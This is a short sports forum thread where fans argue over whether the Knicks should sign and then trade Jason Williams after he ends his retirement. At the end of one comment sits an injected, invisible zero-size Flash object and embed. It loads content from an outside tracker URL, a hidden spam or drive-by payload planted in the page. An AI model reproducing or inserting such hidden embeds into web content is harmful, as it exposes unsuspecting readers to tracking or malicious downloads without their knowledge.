Knicks to sign and trade Williams?

Jason-Williams-nba.jpg

The Knicks have until Thursday to negotiate exclusively with ex-Clipper Jason Williams, who has decided to end his retirement. By claiming Williams on waivers, the Knicks acquired the Clippers' exclusive negotiating rights. But a person with direct knowledge of the Knicks' plans said they intend to trade Williams if they can reach agreement with him on a contract. Since they acquired his rights by claiming him on waivers, the Knicks wouldn't have to wait the customary three months to trade him.

For what? A bag of sh*t??

HAHAHAHAHAHAHAHA my thoughts exactly. Only thing I could see is trading him for a future 2nd rounder or some guy that maybe we are intrigued by their skill set but they are rotting on a bench somewhere, like a Morris Almond type although I don't know who that would be

man, you don't want williams. we might be good to mentor some players but he's damaged goods. i love him but i'd rather give a hungry young prospect the spot.

And what if we sign him and then can't trade him? Sounds like a gamble where the risk outweighs the reward to me.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

I agree, i dont like this transaction. These seldom work out as planned. Too many variables...
